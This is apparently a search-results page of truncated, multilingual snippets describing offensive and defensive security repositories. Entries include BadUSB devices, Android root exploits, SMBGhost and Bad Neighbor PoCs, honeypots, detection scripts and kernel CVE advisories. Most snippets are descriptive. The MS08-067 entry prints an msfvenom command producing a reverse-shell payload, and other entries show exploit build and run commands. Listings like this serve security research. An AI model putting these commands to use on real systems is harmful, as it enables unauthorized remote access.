2671 matches found
bad_ducky
Bad Ducky Summary Bad Ducky एक और Rubber Ducky क्लोन है। यह CJMCU BadUsb ATMEGA32u4 - Arduino Leonardo क्लोन बोर्ड पर आधारित है जिसमें ऑनबोर्ड कार्ड रीडर है, जिसे आप ebay या aliexpress पर खरीद सकते हैं। मेरा लक्ष्य Rubber Ducky स्क्रिप्ट के साथ संगत कुछ बनाना था, जबकि हार्डवेयर में बदलाव किए बिना...
bad_io_uring
Bad IOuring https://www.blackhat.com/us-23/briefings/schedule/index.htmlbad-iouring-a-new-era-of-rooting-for-android-32243 Exploit bauen Stelle sicher, dass das Android NDK installiert ist. Für Pixel 6, root@kitploit: make pixel Für Samsung S22, root@kitploit: make s22 So verwendest du den Exploi...
tpotce
T-Pot - The All In One Multi Honeypot Platform T-Pot is the all in one, optionally distributed, multiarch amd64, arm64 honeypot plattform, supporting 20+ honeypots and countless visualization options using the Elastic Stack, animated live attack maps and lots of security tools to further improve...
CVE-2020-0796-exp
SMBGhostRCEPoC PoC di RCE per CVE-2020-0796 "SMBGhost" Solo a scopo dimostrativo! Usalo solo come riferimento. Sul serio. Non è stato testato al di fuori del mio ambiente di laboratorio. È stato scritto in fretta e ha bisogno di qualche miglioramento per essere più affidabile. A volte provoca un...
CVE-2020-16898-Bad-Neighbor
سياسة بسيطة للكشف عن CVE-2020-16898: الجار السيئ الوظائف التالية التي يوفرها السكريبت :: 1 يتحقق السكريبت من الاستدلال الموصوف هنا: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/ التثبيت root@kitploit: zeek-pkg install zeek/initconf/CVE-2020-16898-Bad-Neighbor أ...
bad-dicom
Bad-DICOM PoC del mio strumento di exploit creato a mano per CVE-2019-11687. Ho creato questo PEDICOM come Proof of Concept per il capstone del mio college: "Rilevamento e prevenzione di attacchi basati su vulnerabilità di file DICOM contro servizi di gestione medica ". Cos'è un PEDICOM...
CVE-2019-2215-HuaweiP20Lite
Porting di CVE-2019-2215 bad binder su Huawei P20lite Android 8.0.0 Descrizione Questo progetto è un exploit per CVE-2019-2215 su Huawei P20lite nella versione Android 8.0.0. Il kernel è nella versione 4.4.23. Questa vulnerabilità è probabilmente quella più documentata tutorial, porting reale su ...
CVE-2020-16898
Rilevamento "Bad Neighbor", CVE-2020-16898 Windows TCP/IP RCE Riepilogo: Un pacchetto di rilevamento di rete per CVE-2020-16898 Vulnerabilità di esecuzione remota di codice TCP/IP di Windows Riferimenti:...
CVE-2019-2215
CVE-2019-2215 Exploit per Bad Binder writeup per questo exploit. Questo è strettamente a soli scopi educativi...
CVE-2019-2215
CVE-2019-2215 PoC per vecchia vulnerabilità Binder basata sull'exploit P0 Descrizione Un use-after-free in binder.c permette un'elevazione dei privilegi da un'applicazione al kernel Linux. Non è richiesta interazione dell'utente per sfruttare questa vulnerabilità, ma lo sfruttamento richiede...
MS08-067
MS08-067 | CVE-2008-4250 Riferimento: https://learn.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-067?redirectedfrom=MSDN Generazione dello shellcode Useremo msfvenom per generare lo shellcode. root@kitploit: msfvenom -p windows/shellreversetcp LHOST=10.10.14.14 LPORT=443...
automato
automato.rb automato uses native LDAP libraries to automate the collection and enumeration of various directory objects. This is incredibly useful during an internal penetration test. automato can also conduct password spraying attacks, and identify if a user is a local administrator against any...
plague
plague Rilevamenti predefiniti per EDR I rilevamenti descritti di seguito sono quelli che cerco di implementare su qualsiasi prodotto EDR che distribuisco o su cui lavoro. Fai le tue valutazioni in merito a criticità e set di dati. Consulta questo post per capire come puoi lavorare per ottenere...
CVE-2020-16898
CVE-2020-16898 Exploit PoC per il BSOD "Bad Neighbor" DoS Usare a proprio rischio! Uso: CVE-2020-16898.exe "inserisci qui l'IP target"...
CVE-2026-80645
In the Linux kernel, the following vulnerability has been resolved: rapidio/tsi721: prevent a bad dereference in tsi721dbdpc With a listforeach loop, if we don't find the item we are looking for in the list, then the loop exits with the iterator, which is "dbell" in this loop, pointing to invalid...
CVE-2026-80645 rapidio/tsi721: prevent a bad dereference in tsi721_db_dpc()
In the Linux kernel, the following vulnerability has been resolved: rapidio/tsi721: prevent a bad dereference in tsi721dbdpc With a listforeach loop, if we don't find the item we are looking for in the list, then the loop exits with the iterator, which is "dbell" in this loop, pointing to invalid...
CVE-2026-80645
In the Linux kernel, the following vulnerability has been resolved: rapidio/tsi721: prevent a bad dereference in tsi721dbdpc With a listforeach loop, if we don't find the item we are looking for in the list, then the loop exits with the iterator, which is "dbell" in this loop, pointing to invalid...
CVE-2026-80645
CVE-2026-80645 affects the Linux kernel in the rapidio/tsi721 driver, specifically the tsi721_db_dpc() function. The root cause is a logic error in a list_for_each() loop: the found variable is not reset to false at the start of each iteration, so once a correct doorbell is found, all subsequent ...
EUVD-2026-67521
In the Linux kernel, the following vulnerability has been resolved: rapidio/tsi721: prevent a bad dereference in tsi721dbdpc With a listforeach loop, if we don't find the item we are looking for in the list, then the loop exits with the iterator, which is "dbell" in this loop, pointing to invalid...
cve-2022-0778
cve-2022-0778 Böser Server root@kitploit: go run server/main.go --addr 127.0.0.1:12345 cd test && testserver.sh docker stat Böser Client root@kitploit: cd test && testclient.sh go run client/main.go --network tcp --addr 127.0.0.1:12345 docker stat Build root@kitploit: docker build -t cve-2022-077...